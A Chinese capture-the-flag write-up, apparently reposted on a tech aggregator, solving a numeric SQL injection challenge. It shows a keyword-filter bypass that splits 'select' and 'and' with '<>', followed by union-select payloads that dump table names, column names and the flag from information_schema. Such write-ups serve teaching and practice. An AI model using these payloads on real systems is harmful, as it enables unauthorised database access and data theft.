首页 > 数据库 >百度杯_sql

百度杯_sql

时间:2023-05-13 16:14:21浏览次数:42  
标签:group lect 百度 sql table concat schema

SQL

这题很明确就是个sql注入,直接测试看下是啥注入。

可以得知是一个数值型的注入。

把关键字都放上去测试发现过滤了select , and , or,可以使用<>绕过

使用o<>rder by测试只有三列

直接构造payload:爆表
0 union se<>lect 1,group_concat(table_name) ,3 from information_schema.tables where table_schema = database()

img

0 union se<>lect 1,group_concat(column_name) ,3 from information_schema.columns where table_schema = database() a<>nd table_name='info'

img

0 union se<>lect 1,group_concat(flAg_T5ZNdrm) ,3 from info

img

标签:group,lect,百度,sql,table,concat,schema
From: https://www.cnblogs.com/qianyuzz/p/17397546.html

相关文章

  • mysql用户表root用户被锁定,无法登陆(Account is locked)
    今天看到mysql的user表就打开了看看,看到root还有些权限是N,然后顺手就改成了Y,结果保存之后就凉凉了,数据库就打不开了,报“Accountislocked”这个错误,上网排查了好半天才解决,解决方法记录一下。解决思路:1、使用skip-grant-tables跳过密码验证,此时可以打开MySQL服务并登录2、......
  • instantclient12&plsql12下载、安装及配置
    一、oracle11gclient下载安装及配置1.1下载instantclient下载链接根据操作系统和机器位数选择相应的下载链接1.2安装及配置1.在E盘创建文件夹比如oracle_client,将下载的压缩包解压到刚新建的文件夹中(E:\oralce_client\instantclient_11_2)。解压好就算安装完成2.在当前......
  • PostgreSQL中的行转列
    PG有三种行转列写法:1、groupby+sum+casewhen2、用postgresql的crosstab函数3、groupby+string_agg+split_part(分组,行转列,字符切割)环境准备1CREATE TABLE sales (2    year INTEGER,3    quarter INTEGER,4    sales_amount NUMERIC5);6......
  • Python学习之五_字符串处理生成查询SQL
    Python学习之五_字符串处理生成查询SQL前言昨天想给同事讲解一下获取查询部分表核心列信息的SQL方法也写好了一个简单文档.但是感觉不是很优雅.最近两三天晚上一直在学习Python.想将昨天的文档处理成一个工具的方式.将查询SQL展示出来.然后再由同事手工检查确认.增加时......
  • MySql的数据存储之B+树(浅谈)
    一.MySql的实际存储位置B+树是MySql数据结构的主流存储方式,包括InnoDB和MYISAM引擎,它们的默认存储结构都是B+树了解B+树前,我们先要知道MySql的实际存储位置在哪?有人会说它存在我么的D盘或C盘的MySql文件夹的Data目录里,这个回答没错,我们在深入的了解一下呢?不管是在个人电脑上......
  • PostgreSQL中的序列名很长很长怎么办
           PostgreSQL中的序列名很长很长怎么办原创SeanHe数据库杂记2023-05-0606:01发表于上海PostgreSQL中的序列名很长很长怎么办tag:PostgreSQL,数据库移植1.前言我们回忆一下,PostgreSQL好像有对象名不超过63个字符的默认限制。详见:current/limit......
  • MySQL多列字段去重的案例实践
    作者:刘晨网名bisal,具有十年以上信息系统建设经验,目前主要从事数据库应用研发能力提升和技术管理方面的工作,OracleACE(Alums),腾讯云TVP,墨天轮MVP,拥有OracleOCM&OCP、EXINDevOpsMaster、SCJP、OBCA、腾讯云CloudLite、PCSD、GDCA等技术认证,国内首批OracleYEP成员,OCMU成......
  • PLSQL一些常用的知识点
    1、背景此处简单的记录一下在oracle中如何使用plsql语法,记录一些简单的例子,防止以后忘记。2、变量的声明declare--声明变量v_namevarchar2(20);--此变量由selectinto赋值v_man_sexnumber;--v_sex变量的类型和student表中的sex字段的类型......
  • PLSQL一些常用的知识点
    1、背景此处简单的记录一下在oracle中如何使用plsql语法,记录一些简单的例子,防止以后忘记。2、变量的声明declare--声明变量v_namevarchar2(20);--此变量由selectinto赋值v_man_sexnumber;--v_sex变量的类型和student表中的sex字段的类型......
  • MySQL学习日志四,数据表的类型
    --关于数据库引擎/*INNODB默认使用MYISAM早些年使用*/区别MYISAMINNODB事务支持不支持支持数据行锁定不支持支持外键约束不支持支持全文索引支持不支持表空间大小较小较大,约为MYISAM2倍常规使用操作:MYISAM节约空间,速度较快INNOD......

赞助商

阅读排行

网站主页关于我们联系我们网站地图

本网站内容转载自其他媒体,侵权联系[admin##ips99.com]。

Copyright © 2020-2023 IPS99 版权所有 IPS99